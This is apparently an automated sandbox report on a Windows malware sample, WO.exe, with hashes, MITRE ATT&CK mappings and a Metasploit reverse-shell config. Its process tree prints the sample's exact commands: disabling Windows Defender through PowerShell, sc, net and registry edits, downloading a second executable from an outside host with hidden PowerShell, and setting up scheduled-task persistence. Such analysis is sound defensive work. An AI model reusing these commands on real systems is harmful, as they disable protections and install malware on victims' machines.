Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-12-2024 18:53
Static task
static1
Behavioral task
behavioral1
Sample
WO.exe
Resource
win7-20240903-en
General
-
Target
WO.exe
-
Size
126KB
-
MD5
7176b040816932541eb9c2b91d90b29b
-
SHA1
137a9c4620366caff2a1d1c297b6ae8c6d28761d
-
SHA256
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
-
SHA512
1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
-
SSDEEP
3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn
Malware Config
Extracted
https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe
Extracted
metasploit
windows/reverse_tcp
147.185.221.23:1121
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 1100 powershell.exe -
pid Process 4964 powershell.exe 3108 powershell.exe 4184 powershell.exe 1100 powershell.exe 4936 powershell.exe 4496 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WO.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WO.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WO.exe -
Executes dropped EXE 5 IoCs
pid Process 2116 reddit.exe 2776 WO.exe 1428 reddit.exe 2292 WO.exe 1352 reddit.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2700 sc.exe 232 sc.exe 4036 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reddit.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2004 schtasks.exe 4804 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 4964 powershell.exe 4964 powershell.exe 1100 powershell.exe 1100 powershell.exe 3108 powershell.exe 3108 powershell.exe 4936 powershell.exe 4936 powershell.exe 4184 powershell.exe 4184 powershell.exe 4496 powershell.exe 4496 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4964 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeDebugPrivilege 4184 powershell.exe Token: SeDebugPrivilege 4496 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3096 wrote to memory of 2276 3096 WO.exe 84 PID 3096 wrote to memory of 2276 3096 WO.exe 84 PID 2276 wrote to memory of 4964 2276 cmd.exe 86 PID 2276 wrote to memory of 4964 2276 cmd.exe 86 PID 2276 wrote to memory of 1100 2276 cmd.exe 87 PID 2276 wrote to memory of 1100 2276 cmd.exe 87 PID 2276 wrote to memory of 2116 2276 cmd.exe 88 PID 2276 wrote to memory of 2116 2276 cmd.exe 88 PID 2276 wrote to memory of 2116 2276 cmd.exe 88 PID 2276 wrote to memory of 5104 2276 cmd.exe 89 PID 2276 wrote to memory of 5104 2276 cmd.exe 89 PID 2276 wrote to memory of 1612 2276 cmd.exe 90 PID 2276 wrote to memory of 1612 2276 cmd.exe 90 PID 2276 wrote to memory of 2004 2276 cmd.exe 91 PID 2276 wrote to memory of 2004 2276 cmd.exe 91 PID 2276 wrote to memory of 2400 2276 cmd.exe 92 PID 2276 wrote to memory of 2400 2276 cmd.exe 92 PID 2276 wrote to memory of 4804 2276 cmd.exe 93 PID 2276 wrote to memory of 4804 2276 cmd.exe 93 PID 2276 wrote to memory of 232 2276 cmd.exe 94 PID 2276 wrote to memory of 232 2276 cmd.exe 94 PID 2276 wrote to memory of 4952 2276 cmd.exe 95 PID 2276 wrote to memory of 4952 2276 cmd.exe 95 PID 4952 wrote to memory of 4776 4952 net.exe 96 PID 4952 wrote to memory of 4776 4952 net.exe 96 PID 2276 wrote to memory of 2864 2276 cmd.exe 97 PID 2276 wrote to memory of 2864 2276 cmd.exe 97 PID 2276 wrote to memory of 3444 2276 cmd.exe 98 PID 2276 wrote to memory of 3444 2276 cmd.exe 98 PID 2776 wrote to memory of 3260 2776 WO.exe 109 PID 2776 wrote to memory of 3260 2776 WO.exe 109 PID 3260 wrote to memory of 3108 3260 cmd.exe 111 PID 3260 wrote to memory of 3108 3260 cmd.exe 111 PID 3260 wrote to memory of 4936 3260 cmd.exe 112 PID 3260 wrote to memory of 4936 3260 cmd.exe 112 PID 3260 wrote to memory of 1428 3260 cmd.exe 113 PID 3260 wrote to memory of 1428 3260 cmd.exe 113 PID 3260 wrote to memory of 1428 3260 cmd.exe 113 PID 3260 wrote to memory of 3908 3260 cmd.exe 114 PID 3260 wrote to memory of 3908 3260 cmd.exe 114 PID 3260 wrote to memory of 2684 3260 cmd.exe 115 PID 3260 wrote to memory of 2684 3260 cmd.exe 115 PID 3260 wrote to memory of 4884 3260 cmd.exe 116 PID 3260 wrote to memory of 4884 3260 cmd.exe 116 PID 3260 wrote to memory of 4036 3260 cmd.exe 117 PID 3260 wrote to memory of 4036 3260 cmd.exe 117 PID 3260 wrote to memory of 1444 3260 cmd.exe 118 PID 3260 wrote to memory of 1444 3260 cmd.exe 118 PID 1444 wrote to memory of 1452 1444 net.exe 119 PID 1444 wrote to memory of 1452 1444 net.exe 119 PID 3260 wrote to memory of 1336 3260 cmd.exe 120 PID 3260 wrote to memory of 1336 3260 cmd.exe 120 PID 3260 wrote to memory of 4460 3260 cmd.exe 121 PID 3260 wrote to memory of 4460 3260 cmd.exe 121 PID 2292 wrote to memory of 2704 2292 WO.exe 123 PID 2292 wrote to memory of 2704 2292 WO.exe 123 PID 2704 wrote to memory of 4184 2704 cmd.exe 125 PID 2704 wrote to memory of 4184 2704 cmd.exe 125 PID 2704 wrote to memory of 4496 2704 cmd.exe 126 PID 2704 wrote to memory of 4496 2704 cmd.exe 126 PID 2704 wrote to memory of 1352 2704 cmd.exe 127 PID 2704 wrote to memory of 1352 2704 cmd.exe 127 PID 2704 wrote to memory of 1352 2704 cmd.exe 127 PID 2704 wrote to memory of 4356 2704 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 5104 attrib.exe 3908 attrib.exe 4356 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\WO.exe"C:\Users\Admin\AppData\Local\Temp\WO.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6CC4.tmp\6CC5.tmp\6CC6.bat C:\Users\Admin\AppData\Local\Temp\WO.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Users\Admin\AppData\Local\Temp\reddit.exe"C:\Users\Admin\AppData\Local\Temp\reddit.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2116
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"3⤵
- Views/modifies file attributes
PID:5104
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵PID:1612
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2004
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵PID:2400
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:4804
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:232
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4776
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3444
-
-
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4486.tmp\4487.tmp\4488.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Users\Admin\AppData\Local\Temp\reddit.exe"C:\Users\Admin\AppData\Local\Temp\reddit.exe"3⤵
- Executes dropped EXE
PID:1428
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"3⤵
- Views/modifies file attributes
PID:3908
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵PID:2684
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵PID:4884
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4036
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:1452
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1336
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4460
-
-
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AFE.tmp\2AFF.tmp\2B00.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
-
C:\Users\Admin\AppData\Local\Temp\reddit.exe"C:\Users\Admin\AppData\Local\Temp\reddit.exe"3⤵
- Executes dropped EXE
PID:1352
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"3⤵
- Views/modifies file attributes
PID:4356
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵PID:4428
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵PID:4900
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵PID:1548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2696
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4144
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2888
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
1KB
MD552a0f7d389660fcf1555a48cb55d969f
SHA163080adf9a1516fea9a54fb27d323c967a9c6a2d
SHA25620a4b42c49a9bc490683cee7c956e678fdfbaf60d0dc570a6aeaa0366dc2c9a0
SHA512268903bc289d9441e40ff8dca45ec390fc474bf4a7a89a4af09d88225b4ebe78271938b91513ca1fb74c8c924b2a8b72271fa49cb73373f70fdaa28f38b2e0f1
-
Filesize
944B
MD5a66904fe28a9c28446e44f44e5ba034b
SHA1d4277226b3b95b2f92dc745bda7096a98d4a9f26
SHA256eb82b392f4cc90f4bb62e8d5d779a23ee0aa67832dcc8af94ce6099dd6cef8a7
SHA512a873699317c8905a3171985b04f9aa15993224bf18dad3233254229e04deec7232eb9effa1f6f17a9ad525d33a65cc7bb0000d899c2ebcc8ab312be6d01081a1
-
Filesize
1KB
MD5c1cbb90689c246abb01ae2a93900e148
SHA1675c4f6008805f6a4958b1a0f435fcb9603ca2a5
SHA25690a401a84f4514e8d514450de21f9f4e802aff15d0d624567181dea18b0a495c
SHA512e7e836be97922b165f0ade9d9ffd471bdd28c5b82eab75b02e054319174ea6e5a0893b5d53c0ea0827c784e464d4132f88100a1790573156c034a1c4dd8e64b9
-
Filesize
2KB
MD5c0e9bc2dfff6e08df8196809b9bbf253
SHA1006e88ea359145c40a6bbca55e6f21b387999255
SHA25643c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11
SHA5125b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
72KB
MD523544090c6d379e3eca7343c4f05d4d2
SHA1c9250e363790a573e9921a68b7abe64f27e63df1
SHA256b439d22ed2c1e1f83f3c52d1a7307d9aee8b516166ab221cb6d67b188cd80f56
SHA5126aca78b0653e87ac80d7f562e6ab6d650f4d53d375cad043eb9613c7bbd642f7f82564a872b1b05520a77acbeba9da0540c4cd5a855a28a8188ebe3a4b57775c
-
Filesize
126KB
MD57176b040816932541eb9c2b91d90b29b
SHA1137a9c4620366caff2a1d1c297b6ae8c6d28761d
SHA256db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
SHA5121332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de